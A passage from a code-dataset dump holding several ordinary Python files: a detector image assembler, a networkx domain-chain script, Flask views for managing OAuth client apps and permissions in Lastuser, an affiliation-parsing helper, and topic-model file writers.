(memory cells, x, y)\n - raw, (memory cells, 1, x, y)\n\n - calibrated, \"image.data\", (modules, x, y, memory cells)\n - raw, \"image.data\", (modules, x, y, memory cells)\n -> (memory cells, modules, y, x)\n \"\"\"\n return np.moveaxis(np.moveaxis(data[src], 3, 0), 3, 2)\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n - calibrated, \"image.data\", (memory cells, modules, y, x)\n - raw, \"image.data\", (memory cell, 1, modules, y, x)\n -> (memory cells, modules, y, x)\n \"\"\"\n modules_data = stack_detector_data(\n data[src], src.split(' ')[1], real_array=False)\n\n dtype = modules_data.dtype\n if dtype == _IMAGE_DTYPE:\n return modules_data\n if dtype == _RAW_IMAGE_DTYPE:\n return modules_data.squeeze(axis=1)\n\n raise AssemblingError(f\"Unknown detector data type: {dtype}!\")\n\n def _load_geometry(self, filename, quad_positions):\n \"\"\"Override.\"\"\"\n if self._assembler_type == GeomAssembler.OWN:\n from ...geometries import DSSC_1MGeometryFast\n\n if self._stack_only:\n self._geom = DSSC_1MGeometryFast()\n else:\n try:\n self._geom = DSSC_1MGeometryFast.from_h5_file_and_quad_positions(\n filename, quad_positions)\n except (OSError, KeyError) as e:\n raise AssemblingError(f\"[Geometry] {e}\")\n else:\n from ...geometries import DSSC_1MGeometry\n\n try:\n self._geom = DSSC_1MGeometry.from_h5_file_and_quad_positions(\n filename, quad_positions)\n except (OSError, KeyError) as e:\n raise AssemblingError(f\"[Geometry] {e}\")\n\n class JungFrauImageAssembler(BaseAssembler):\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n Calibrated data only.\n\n - calibrated, \"data.adc\", (y, x, modules)\n - raw, \"data.adc\", TODO\n -> (y, x)\n \"\"\"\n modules_data = data[src]\n if modules_data.shape[-1] == 1:\n return modules_data.squeeze(axis=-1)\n else:\n raise NotImplementedError(\"Number of modules > 1\")\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n - calibrated, \"data.adc\", (modules, y, x)\n - raw, \"data.adc\", (modules, y, x)\n -> (y, x)\n \"\"\"\n modules_data = data[src]\n if modules_data.shape[0] == 1:\n return modules_data.squeeze(axis=0)\n else:\n raise NotImplementedError(\"Number of modules > 1\")\n\n class JungFrauPulseResolvedImageAssembler(BaseAssembler):\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n Calibrated data only.\n\n - calibrated, \"data.adc\", TODO\n - raw, \"data.adc\", TODO\n -> (memory cells, modules, y, x)\n \"\"\"\n modules_data = data[src]\n shape = modules_data.shape\n ndim = len(shape)\n if ndim == 3:\n # (y, x, memory cells) -> (memory cells, 1 module, y, x)\n return np.moveaxis(modules_data, -1, 0)[:, np.newaxis, ...]\n # (modules, y, x, memory cells) -> (memory cells, modules, y, x)\n return np.moveaxis(modules_data, -1, 0)\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n -> (memory cells, modules, y, x)\n \"\"\"\n # modules_data = data[src_name][\"data.adc\"]\n # shape = modules_data.shape\n # ndim = len(shape)\n # if ndim == 3:\n # # (pusles, y, x) -> (pulses, 1 module, y, x)\n # return modules_data[:, np.newaxis, :]\n # # (pulses, modules, y, x,) -> (pulses, modules, y, x)\n # return modules_data\n raise NotImplementedError\n\n class EPix100ImageAssembler(BaseAssembler):\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n - calibrated, \"data.image\", (y, x, 1)\n - raw, \"data.image.data\", (1, y, x)\n -> (y, x)\n \"\"\"\n img_data = data[src]\n dtype = img_data.dtype\n\n if dtype == _IMAGE_DTYPE:\n return img_data.squeeze(axis=-1)\n\n # raw data of ePix100 has an unexpected dtype int16\n if dtype == np.int16:\n return img_data.squeeze(axis=0)\n\n raise AssemblingError(f\"Unknown detector data type: {dtype}!\")\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n - calibrated, \"data.image.pixels\", (y, x)\n - raw, \"data.image.pixels\", (y, x)\n -> (y, x)\n \"\"\"\n return data[src]\n\n class FastCCDImageAssembler(BaseAssembler):\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n - calibrated, \"data.image\", (y, x, 1)\n - raw, \"data.image.data\", (y, x)\n -> (y, x)\n \"\"\"\n img_data = data[src]\n dtype = img_data.dtype\n\n if dtype == _IMAGE_DTYPE:\n return img_data.squeeze(axis=-1)\n\n if dtype == _RAW_IMAGE_DTYPE:\n return img_data\n\n raise AssemblingError(f\"Unknown detector data type: {dtype}!\")\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n - calibrated, \"data.image.pixels\", (y, x)\n - raw, \"data.image.pixels\", (y, x)\n -> (y, x)\n \"\"\"\n return data[src]\n\n class BaslerCameraImageAssembler(BaseAssembler):\n # TODO: remove BaslerCamera from detector\n # make a category for BaslerCamera.\n def _get_modules_bridge(self, data, src):\n \"\"\"Override.\n\n - raw, \"data.image.data\", (y, x)\n -> (y, x)\n \"\"\"\n # (y, x)\n return data[src]\n\n def _get_modules_file(self, data, src):\n \"\"\"Override.\n\n -> (y, x)\n \"\"\"\n raise NotImplementedError\n\n @classmethod\n def create(cls, detector):\n if detector == 'AGIPD':\n return cls.AgipdImageAssembler()\n\n if detector == 'LPD':\n return cls.LpdImageAssembler()\n\n if detector == 'DSSC':\n return cls.DsscImageAssembler()\n\n if detector == 'JungFrau':\n return cls.JungFrauImageAssembler()\n\n if detector == 'FastCCD':\n return cls.FastCCDImageAssembler()\n\n if detector == 'ePix100':\n return cls.EPix100ImageAssembler()\n\n if detector == 'BaslerCamera':\n return cls.BaslerCameraImageAssembler()\n\n if detector == 'JungFrauPR':\n return cls.JungFrauPulseResolvedImageAssembler()\n\n raise NotImplementedError(f\"Unknown detector type {detector}!\")\n","sub_path":"extra_foam/pipeline/processors/image_assembler.py","file_name":"image_assembler.py","file_ext":"py","file_size_in_byte":23100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"357822620","text":"import sys\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\nimport csv\r\n\r\n\"\"\"\r\n save chains\r\n\"\"\"\r\ndef save_chains(filename, chains):\r\n\r\n if sys.version_info >= (3,0,0):\r\n fp = open(filename, 'w', newline='')\r\n else:\r\n fp = open(filename, 'wb')\r\n wrt = csv.writer(fp)\r\n\r\n c = 0\r\n rej = 0\r\n for g in sorted(chains, key=len, reverse=True):\r\n if len(g) == 1:\r\n wrt.writerow([x for x in g.nodes()])\r\n c += 1\r\n else:\r\n roots = [x for x in g if g.node[x]['role'] == 'root']\r\n terms = [x for x in g if g.node[x]['role'] == 'term']\r\n\r\n for r in roots:\r\n for t in terms:\r\n ch = nx.shortest_path(g, source=r, target=t)\r\n if ch:\r\n tts = [x for x in ch if g.node[x]['role'] == 'term']\r\n if len(tts) == 1:\r\n wrt.writerow(ch)\r\n c += 1\r\n else:\r\n rej += 1\r\n #print([g.node[x]['role'] for x in ch])\r\n\r\n return c, rej\r\n\r\n\"\"\"\r\n load chain fragments\r\n\"\"\"\r\ndef load_chains(fp, limit=0):\r\n g = nx.DiGraph()\r\n\r\n for i, line in enumerate(fp):\r\n\r\n if limit and i > limit:\r\n break\r\n\r\n p = [x.strip() for x in line.split('\\t')]\r\n\r\n g.add_node(p[0], {'role': 'middle', 'color': 'y'})\r\n if p[1] and 'a' not in p[2] and 'q' not in p[2]:\r\n g.add_node(p[1], {'role': 'middle', 'color': 'y'})\r\n g.add_edge(p[0], p[1])\r\n\r\n for n in g:\r\n # root domain\r\n if not len(g.in_edges(n)):\r\n g.node[n]['role'] = 'root'\r\n g.node[n]['color'] = 'g'\r\n\r\n if not len(g.out_edges(n)):\r\n g.node[n]['role'] = 'term'\r\n g.node[n]['color'] = 'r'\r\n\r\n return g\r\n\r\n\"\"\"\r\n\"\"\"\r\ndef plot_chains(g, filename=''):\r\n\r\n pos=nx.spring_layout(g)\r\n colors = [g.node[x]['color'] for x in g]\r\n\r\n nx.draw_networkx_nodes(g, pos, node_color=colors)\r\n nx.draw_networkx_edges(g, pos)\r\n if len(g) <= 5:\r\n nx.draw_networkx_labels(g,pos)\r\n\r\n plt.axis('off')\r\n #plt.legend()\r\n if filename:\r\n plt.savefig(filename)\r\n else:\r\n plt.show()\r\n\r\n\"\"\"\r\n\"\"\"\r\ndef get_term_count(g):\r\n return len([x for x in g if g.node[x]['role'] == 'term'])\r\n\r\n\"\"\"\r\n chain terminators histogram\r\n\"\"\"\r\ndef chain_term_hist(chains):\r\n terms = {}\r\n for g in chains:\r\n n = len([x for x in g if g.node[x]['role'] == 'term'])\r\n if n in terms:\r\n terms[n] += 1\r\n else:\r\n terms[n] = 1\r\n\r\n return terms\r\n\r\n\"\"\"\r\n chain length histogram\r\n\"\"\"\r\ndef chain_len_hist(chains):\r\n lens = {}\r\n for g in chains:\r\n n = nx.number_of_nodes(g)\r\n if n in lens:\r\n lens[n] += 1\r\n else:\r\n lens[n] = 1\r\n\r\n return lens\r\n\r\n\"\"\"\r\n\"\"\"\r\ndef main():\r\n chains_fn = 'c_newff.tsv'\r\n if len(sys.argv) > 1:\r\n chains_fn = sys.argv[1]\r\n\r\n chains_out = 'full_chains.csv'\r\n if len(sys.argv) > 2:\r\n chains_out = sys.argv[2]\r\n\r\n gr = None\r\n with open(chains_fn) as fp:\r\n gr = load_chains(fp)\r\n\r\n print('{} domains loaded...'.format(len(gr.nodes())))\r\n ug = gr.to_undirected()\r\n # list of graphs of all connected components\r\n chains = [g.copy() for g in sorted(nx.connected_component_subgraphs(ug), key=len, reverse=True)]\r\n\r\n c, rej = save_chains(chains_out, chains)\r\n print('{} chains written ({} rejected)...'.format(c, rej))\r\n print('{} trees found...'.format(len(chains)))\r\n\r\n print('nodes per tree: {}'.format(chain_len_hist(chains)))\r\n print('terminals per tree: {}'.format(chain_term_hist(chains)))\r\n\r\n plot_chains(chains[2])\r\n #for g in chains:\r\n # if get_term_count(g) > 1:\r\n # plot_chains(g)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","sub_path":"dataset/makegraph.py","file_name":"makegraph.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"135654152","text":"# -*- coding: utf-8 -*-\n\nfrom flask import request, render_template, url_for, flash, abort\nfrom coaster.auth import current_auth\nfrom coaster.views import load_model, load_models\nfrom baseframe import _\nfrom baseframe.forms import render_form, render_redirect, render_delete_sqla\n\nfrom lastuser_core.models import (db, User, Client, Organization, Team, Permission, ClientCredential,\n UserClientPermissions, TeamClientPermissions, Resource, ResourceAction, ClientTeamAccess,\n CLIENT_TEAM_ACCESS)\nfrom lastuser_oauth.views.helpers import requires_login\nfrom .. import lastuser_ui\nfrom ..forms import (RegisterClientForm, PermissionForm, UserPermissionAssignForm, ClientCredentialForm,\n TeamPermissionAssignForm, PermissionEditForm, ResourceForm, ResourceActionForm, ClientTeamAccessForm)\n\n# --- Routes: client apps -----------------------------------------------------\n\n\n@lastuser_ui.route('/apps')\n@requires_login\ndef client_list():\n if current_auth.is_authenticated:\n return render_template('client_list.html.jinja2', clients=Client.query.filter(db.or_(Client.user == current_auth.user,\n Client.org_id.in_(current_auth.user.organizations_owned_ids()))).order_by(Client.title).all())\n else:\n # TODO: Show better UI for non-logged in users\n return render_template('client_list.html.jinja2', clients=[])\n\n\n@lastuser_ui.route('/apps/all')\ndef client_list_all():\n return render_template('client_list.html.jinja2', clients=Client.query.order_by(Client.title).all())\n\n\ndef available_client_owners():\n \"\"\"\n Return a list of possible client owners for the current user.\n \"\"\"\n choices = []\n choices.append((current_auth.user.buid, current_auth.user.pickername))\n for org in current_auth.user.organizations_owned():\n choices.append((org.buid, org.pickername))\n return choices\n\n\n@lastuser_ui.route('/apps/new', methods=['GET', 'POST'])\n@requires_login\ndef client_new():\n form = RegisterClientForm(model=Client)\n form.edit_user = current_auth.user\n form.client_owner.choices = available_client_owners()\n if request.method == 'GET':\n form.client_owner.data = current_auth.user.buid\n\n if form.validate_on_submit():\n client = Client()\n form.populate_obj(client)\n client.user = form.user\n client.org = form.org\n client.trusted = False\n db.session.add(client)\n db.session.commit()\n return render_redirect(url_for('.client_info', key=client.key), code=303)\n\n return render_form(form=form, title=_(\"Register a new client application\"),\n formid='client_new', submit=_(\"Register application\"), ajax=True)\n\n\n@lastuser_ui.route('/apps/')\n@load_model(Client, {'key': 'key'}, 'client', permission='view')\ndef client_info(client):\n if client.user:\n permassignments = UserClientPermissions.query.filter_by(client=client).all()\n else:\n permassignments = TeamClientPermissions.query.filter_by(client=client).all()\n resources = Resource.query.filter_by(client=client).order_by(Resource.name).all()\n return render_template('client_info.html.jinja2', client=client,\n permassignments=permassignments,\n resources=resources)\n\n\n@lastuser_ui.route('/apps//edit', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client', permission='edit')\ndef client_edit(client):\n form = RegisterClientForm(obj=client, model=Client)\n form.edit_user = current_auth.user\n form.client_owner.choices = available_client_owners()\n if request.method == 'GET':\n if client.user:\n form.client_owner.data = client.user.buid\n else:\n form.client_owner.data = client.org.buid\n\n if form.validate_on_submit():\n if client.user != form.user or client.org != form.org:\n # Ownership has changed. Remove existing permission assignments\n for perm in UserClientPermissions.query.filter_by(client=client).all():\n db.session.delete(perm)\n for perm in TeamClientPermissions.query.filter_by(client=client).all():\n db.session.delete(perm)\n flash(_(u\"This application’s owner has changed, so all previously assigned permissions \"\n \"have been revoked\"), 'warning')\n form.populate_obj(client)\n client.user = form.user\n client.org = form.org\n if not client.team_access:\n # This client does not have access to teams in organizations. Remove all existing assignments\n for cta in ClientTeamAccess.query.filter_by(client=client).all():\n db.session.delete(cta)\n db.session.commit()\n return render_redirect(url_for('.client_info', key=client.key), code=303)\n\n return render_form(form=form, title=_(\"Edit application\"), formid='client_edit',\n submit=_(\"Save changes\"), ajax=True)\n\n\n@lastuser_ui.route('/apps//delete', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client', permission='delete')\ndef client_delete(client):\n return render_delete_sqla(client, db, title=_(u\"Confirm delete\"),\n message=_(u\"Delete application ‘{title}’? \").format(title=client.title),\n success=_(u\"You have deleted application ‘{title}’ and all its associated resources and permission assignments\").format(\n title=client.title),\n next=url_for('.client_list'))\n\n\n# --- Routes: client credentials ----------------------------------------------\n\n@lastuser_ui.route('/apps//cred', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client', permission='edit')\ndef client_cred_new(client):\n form = ClientCredentialForm()\n if request.method == 'GET' and not client.credentials:\n form.title.data = _(\"Default\")\n if form.validate_on_submit():\n cred, secret = ClientCredential.new(client)\n cred.title = form.title.data\n db.session.commit()\n return render_template('client_cred.html.jinja2', name=cred.name, secret=secret, cred=cred)\n return render_form(form=form, title=_(\"New access key\"), formid='client_cred',\n submit=_(\"Create\"), ajax=False)\n\n\n@lastuser_ui.route('/apps//cred//delete', methods=['GET', 'POST'])\n@requires_login\n@load_models(\n (Client, {'key': 'key'}, 'client'),\n (ClientCredential, {'name': 'name', 'client': 'client'}, 'cred'),\n permission='delete')\ndef client_cred_delete(client, cred):\n return render_delete_sqla(cred, db, title=_(u\"Confirm delete\"),\n message=_(u\"Delete access key ‘{title}’? \").format(title=cred.title),\n success=_(u\"You have deleted access key ‘{title}’\").format(title=cred.title),\n next=url_for('.client_info', key=client.key))\n\n\n# --- Routes: user permissions ------------------------------------------------\n\n@lastuser_ui.route('/perms')\n@requires_login\ndef permission_list():\n allperms = Permission.query.filter_by(allusers=True).order_by(Permission.name).all()\n userperms = Permission.query.filter(\n db.or_(Permission.user_id == current_auth.user.id,\n Permission.org_id.in_(current_auth.user.organizations_owned_ids()))\n ).order_by(Permission.name).all()\n return render_template('permission_list.html.jinja2', allperms=allperms, userperms=userperms)\n\n\n@lastuser_ui.route('/perms/new', methods=['GET', 'POST'])\n@requires_login\ndef permission_new():\n form = PermissionForm()\n form.edit_user = current_auth.user\n form.context.choices = available_client_owners()\n if request.method == 'GET':\n form.context.data = current_auth.user.buid\n if form.validate_on_submit():\n perm = Permission()\n form.populate_obj(perm)\n perm.user = form.user\n perm.org = form.org\n perm.allusers = False\n db.session.add(perm)\n db.session.commit()\n flash(_(\"Your new permission has been defined\"), 'success')\n return render_redirect(url_for('.permission_list'), code=303)\n return render_form(form=form, title=_(\"Define a new permission\"), formid='perm_new',\n submit=_(\"Define new permission\"), ajax=True)\n\n\n@lastuser_ui.route('/perms//edit', methods=['GET', 'POST'])\n@requires_login\n@load_model(Permission, {'id': 'id'}, 'perm', permission='edit')\ndef permission_edit(perm):\n form = PermissionForm(obj=perm)\n form.edit_user = current_auth.user\n form.context.choices = available_client_owners()\n if request.method == 'GET':\n if perm.user:\n form.context.data = perm.user.buid\n else:\n form.context.data = perm.org.buid\n if form.validate_on_submit():\n form.populate_obj(perm)\n perm.user = form.user\n perm.org = form.org\n db.session.commit()\n flash(_(\"Your permission has been saved\"), 'success')\n return render_redirect(url_for('.permission_list'), code=303)\n return render_form(form=form, title=_(\"Edit permission\"), formid='perm_edit',\n submit=_(\"Save changes\"), ajax=True)\n\n\n@lastuser_ui.route('/perms//delete', methods=['GET', 'POST'])\n@requires_login\n@load_model(Permission, {'id': 'id'}, 'perm', permission='delete')\ndef permission_delete(perm):\n return render_delete_sqla(perm, db, title=_(u\"Confirm delete\"), message=_(u\"Delete permission ‘{name}’?\").format(name=perm.name),\n success=_(\"Your permission has been deleted\"),\n next=url_for('.permission_list'))\n\n\n# --- Routes: client app permissions ------------------------------------------\n\n\n@lastuser_ui.route('/apps//perms/new', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client', permission='assign-permissions')\ndef permission_user_new(client):\n if client.user:\n available_perms = Permission.query.filter(db.or_(\n Permission.allusers == True,\n Permission.user == current_auth.user)).order_by(Permission.name).all() # NOQA\n form = UserPermissionAssignForm()\n elif client.org:\n available_perms = Permission.query.filter(db.or_(\n Permission.allusers == True,\n Permission.org == client.org)).order_by(Permssion.name).all() # NOQA\n form = TeamPermissionAssignForm()\n form.org = client.org\n form.team_id.choices = [(team.buid, team.title) for team in client.org.teams]\n else:\n abort(403) # This should never happen. Clients always have an owner.\n form.perms.choices = [(ap.name, _(u\"{name} – {title}\").format(name=ap.name, title=ap.title)) for ap in available_perms]\n if form.validate_on_submit():\n perms = set()\n if client.user:\n permassign = UserClientPermissions.query.filter_by(user=form.user.data, client=client).first()\n if permassign:\n perms.update(permassign.access_permissions.split(u' '))\n else:\n permassign = UserClientPermissions(user=form.user.data, client=client)\n db.session.add(permassign)\n else:\n permassign = TeamClientPermissions.query.filter_by(team=form.team, client=client).first()\n if permassign:\n perms.update(permassign.access_permissions.split(u' '))\n else:\n permassign = TeamClientPermissions(team=form.team, client=client)\n db.session.add(permassign)\n perms.update(form.perms.data)\n permassign.access_permissions = u' '.join(sorted(perms))\n db.session.commit()\n if client.user:\n flash(_(u\"Permissions have been assigned to user {pname}\").format(pname=form.user.data.pickername), 'success')\n else:\n flash(_(u\"Permissions have been assigned to team ‘{pname}’\").format(pname=permassign.team.pickername), 'success')\n return render_redirect(url_for('.client_info', key=client.key), code=303)\n return render_form(form=form, title=_(\"Assign permissions\"), formid='perm_assign',\n submit=_(\"Assign permissions\"))\n\n\n@lastuser_ui.route('/apps//perms//edit', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client', permission='assign-permissions', kwargs=True)\ndef permission_user_edit(client, kwargs):\n if client.user:\n user = User.get(buid=kwargs['buid'])\n if not user:\n abort(404)\n available_perms = Permission.query.filter(db.or_(\n Permission.allusers == True,\n Permission.user == current_auth.user)).order_by(Permission.name).all() # NOQA\n permassign = UserClientPermissions.query.filter_by(user=user, client=client).first_or_404()\n elif client.org:\n team = Team.get(buid=kwargs['buid'])\n if not team:\n abort(404)\n available_perms = Permission.query.filter(db.or_(\n Permission.allusers == True,\n Permission.org == client.org)).order_by(Permission.name).all() # NOQA\n permassign = TeamClientPermissions.query.filter_by(team=team, client=client).first_or_404()\n form = PermissionEditForm()\n form.perms.choices = [(ap.name, _(u\"{name} – {title}\").format(name=ap.name, title=ap.title)) for ap in available_perms]\n if request.method == 'GET':\n if permassign:\n form.perms.data = permassign.access_permissions.split(u' ')\n if form.validate_on_submit():\n form.perms.data.sort()\n perms = u' '.join(form.perms.data)\n if not perms:\n db.session.delete(permassign)\n else:\n permassign.access_permissions = perms\n db.session.commit()\n if perms:\n if client.user:\n flash(_(u\"Permissions have been updated for user {pname}\").format(pname=user.pickername), 'success')\n else:\n flash(_(u\"Permissions have been updated for team {title}\").format(title=team.title), 'success')\n else:\n if client.user:\n flash(_(u\"All permissions have been revoked for user {pname}\").format(pname=user.pickername), 'success')\n else:\n flash(_(u\"All permissions have been revoked for team {title}\").format(title=team.title), 'success')\n return render_redirect(url_for('.client_info', key=client.key), code=303)\n return render_form(form=form, title=_(\"Edit permissions\"), formid='perm_edit', submit=_(\"Save changes\"), ajax=True)\n\n\n@lastuser_ui.route('/apps//perms//delete', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client', permission='assign-permissions', kwargs=True)\ndef permission_user_delete(client, kwargs):\n if client.user:\n user = User.get(buid=kwargs['buid'])\n if not user:\n abort(404)\n permassign = UserClientPermissions.query.filter_by(user=user, client=client).first_or_404()\n return render_delete_sqla(permassign, db, title=_(u\"Confirm delete\"),\n message=_(u\"Remove all permissions assigned to user {pname} for app ‘{title}’?\").format(\n pname=user.pickername, title=client.title),\n success=_(u\"You have revoked permisions for user {pname}\").format(pname=user.pickername),\n next=url_for('.client_info', key=client.key))\n else:\n team = Team.get(buid=kwargs['buid'])\n if not team:\n abort(404)\n permassign = TeamClientPermissions.query.filter_by(team=team, client=client).first_or_404()\n return render_delete_sqla(permassign, db, title=_(u\"Confirm delete\"),\n message=_(u\"Remove all permissions assigned to team ‘{pname}’ for app ‘{title}’?\").format(\n pname=team.title, title=client.title),\n success=_(u\"You have revoked permisions for team {title}\").format(title=team.title),\n next=url_for('.client_info', key=client.key))\n\n\n# --- Routes: client app resources --------------------------------------------\n\n@lastuser_ui.route('/apps//resources/new', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client', permission='new-resource')\ndef resource_new(client):\n form = ResourceForm()\n form.client = client\n form.edit_id = None\n if form.validate_on_submit():\n resource = Resource(client=client)\n form.populate_obj(resource)\n db.session.add(resource)\n db.session.commit()\n flash(_(\"Your new resource has been saved\"), 'success')\n return render_redirect(url_for('.client_info', key=client.key), code=303)\n return render_form(form=form, title=_(\"Define a resource\"), formid='resource_new',\n submit=_(\"Define resource\"), ajax=True)\n\n\n@lastuser_ui.route('/apps//resources//edit', methods=['GET', 'POST'])\n@requires_login\n@load_models(\n (Client, {'key': 'key'}, 'client'),\n (Resource, {'id': 'idr', 'client': 'client'}, 'resource'),\n permission='edit')\ndef resource_edit(client, resource):\n form = ResourceForm(obj=resource)\n form.client = client\n if form.validate_on_submit():\n form.populate_obj(resource)\n db.session.commit()\n flash(_(\"Your resource has been edited\"), 'success')\n return render_redirect(url_for('.client_info', key=client.key), code=303)\n return render_form(form=form, title=_(\"Edit resource\"), formid='resource_edit',\n submit=_(\"Save changes\"), ajax=True)\n\n\n@lastuser_ui.route('/apps//resources//delete', methods=['GET', 'POST'])\n@requires_login\n@load_models(\n (Client, {'key': 'key'}, 'client'),\n (Resource, {'id': 'idr', 'client': 'client'}, 'resource'),\n permission='delete')\ndef resource_delete(client, resource):\n return render_delete_sqla(resource, db, title=_(u\"Confirm delete\"),\n message=_(u\"Delete resource ‘{resource}’ from app ‘{client}’?\").format(\n resource=resource.title, client=client.title),\n success=_(u\"You have deleted resource ‘{resource}’ on app ‘{client}’\").format(\n resource=resource.title, client=client.title),\n next=url_for('.client_info', key=client.key))\n\n\n# --- Routes: resource actions ------------------------------------------------\n\n@lastuser_ui.route('/apps//resources//actions/new', methods=['GET', 'POST'])\n@requires_login\n@load_models(\n (Client, {'key': 'key'}, 'client'),\n (Resource, {'id': 'idr', 'client': 'client'}, 'resource'),\n permission='new-action')\ndef resource_action_new(client, resource):\n form = ResourceActionForm()\n form.edit_id = None\n form.edit_resource = resource\n if form.validate_on_submit():\n action = ResourceAction(resource=resource)\n form.populate_obj(action)\n db.session.add(action)\n db.session.commit()\n flash(_(\"Your new action has been saved\"), 'success')\n return render_redirect(url_for('.client_info', key=client.key), code=303)\n return render_form(form=form, title=_(\"Define an action\"), formid='action_new',\n submit=_(\"Define action\"), ajax=True)\n\n\n@lastuser_ui.route('/apps//resources//actions//edit', methods=['GET', 'POST'])\n@requires_login\n@load_models(\n (Client, {'key': 'key'}, 'client'),\n (Resource, {'id': 'idr', 'client': 'client'}, 'resource'),\n (ResourceAction, {'id': 'ida', 'resource': 'resource'}, 'action'),\n permission='edit')\ndef resource_action_edit(client, resource, action):\n form = ResourceActionForm(obj=action)\n form.edit_resource = resource\n if form.validate_on_submit():\n form.populate_obj(action)\n db.session.commit()\n flash(_(\"Your action has been edited\"), 'success')\n return render_redirect(url_for('.client_info', key=client.key), code=303)\n return render_form(form=form, title=_(\"Edit action\"), formid='action_edit',\n submit=_(\"Save changes\"), ajax=True)\n\n\n@lastuser_ui.route('/apps//resources//actions//delete', methods=['GET', 'POST'])\n@requires_login\n@load_models(\n (Client, {'key': 'key'}, 'client'),\n (Resource, {'id': 'idr', 'client': 'client'}, 'resource'),\n (ResourceAction, {'id': 'ida', 'resource': 'resource'}, 'action'),\n permission='delete')\ndef resource_action_delete(client, resource, action):\n return render_delete_sqla(action, db, title=_(\"Confirm delete\"),\n message=_(u\"Delete action ‘{action}’ from resource ‘{resource}’ of app ‘{client}’?\").format(\n action=action.title, resource=resource.title, client=client.title),\n success=_(u\"You have deleted action ‘{action}’ on resource ‘{resource}’ of app ‘{client}’\").format(\n action=action.title, resource=resource.title, client=client.title),\n next=url_for('.client_info', key=client.key))\n\n\n# --- Routes: client team access ----------------------------------------------\n\n@lastuser_ui.route('/apps//teams', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client')\ndef client_team_access(client):\n form = ClientTeamAccessForm()\n user_orgs = current_auth.user.organizations_owned()\n form.organizations.choices = [(org.buid, org.title) for org in user_orgs]\n org_selected = [org.buid for org in user_orgs if client in org.clients_with_team_access()]\n if request.method == 'GET':\n form.organizations.data = org_selected\n if form.validate_on_submit():\n org_del = Organization.query.filter(Organization.buid.in_(\n set(org_selected) - set(form.organizations.data))).all()\n org_add = Organization.query.filter(Organization.buid.in_(\n set(form.organizations.data) - set(org_selected))).all()\n cta_del = ClientTeamAccess.query.filter_by(client=client).filter(\n ClientTeamAccess.org_id.in_([org.id for org in org_del])).all()\n for cta in cta_del:\n db.session.delete(cta)\n for org in org_add:\n cta = ClientTeamAccess(org=org, client=client, access_level=CLIENT_TEAM_ACCESS.ALL)\n db.session.add(cta)\n db.session.commit()\n flash(_(\"You have assigned access to teams in your organizations for this app\"), 'success')\n return render_redirect(url_for('.client_info', key=client.key), code=303)\n return render_form(form=form, title=_(\"Select organizations\"), submit=_(\"Save\"), ajax=True)\n","sub_path":"lastuser_ui/views/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":22200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"513124623","text":"from ..data import MULTIPLE_CAMPUS\n\n\ndef append_institution_city(affil: str, location: str):\n \"\"\"\n Append city to university that has multiple campuses if exist\n \"\"\"\n for university in MULTIPLE_CAMPUS:\n if university in affil.lower():\n for city in MULTIPLE_CAMPUS[university]:\n if city in location.lower() and not city in affil.lower():\n affil = affil + \", \" + city\n return affil\n return affil\n","sub_path":"affiliation_parser/parser/append_institution_city.py","file_name":"append_institution_city.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"634340854","text":"# coding: utf-8\nimport codecs\nimport json\n\n__author__ = \"Adrien Guille\"\n__email__ = \"adrien.guille@univ-lyon2.fr\"\n\n\ndef save_word_distribution(distribution, file_path):\n with codecs.open(file_path, 'w', encoding='utf-8') as f:\n f.write('word\\tweight\\n')\n for weighted_word in distribution:\n f.write(weighted_word[0]+'\\t'+str(weighted_word[1])+'\\n')\n\n\ndef save_topic_distribution(distribution, file_path):\n with codecs.open(file_path, 'w', encoding='utf-8') as f:\n f.write('topic\\tweight\\n')\n for i in range(len(distribution)):\n f.write('topic '+str(i)+'\\t'+str(distribution[i])+'\\n')\n\n\ndef save_topic_evolution(evolution, file_path):\n with codecs.open(file_path, 'w', encoding='utf-8') as f:\n f.write('date\\tfrequency\\n')\n for date, frequency in evolution:\n f.write(str(date)+'\\t'+str(frequency)+'\\n')\n\n\ndef save_affiliation_repartition(affiliation_repartition, file_path):\n with codecs.open(file_path, 'w', encoding='utf-8') as f:\n f.write('affiliation\\tcount\\n')\n for affiliation, count in affiliation_repartition.items():\n f.write(affiliation+'\\t'+str(count)+'\\n')\n\n\ndef save_topic_cloud(topic_model, file_path):\n json_graph = {}\n json_nodes = []\n json_links = []\n for i in range(topic_model.nb_topics):\n description = []\n for weighted_word in topic_model.top_words(i, 5):\n description.append(weighted_word[0])\n json_nodes.append({'name': i,\n 'frequency': topic_model.topic_frequency(i),\n 'description': ', '.join(description),\n 'group': i})\n json_graph['nodes'] = json_nodes\n json_graph['links'] = json_links\n with codecs.open(file_path, 'w', encoding='utf-8') as fp:\n json.dump(json_graph, fp, indent=4, separators=(',', ': '))\n\n\ndef save_json_object(json_object, file_path):\n with codecs.open(file_path, 'w', encoding='utf-8') as fp:\n 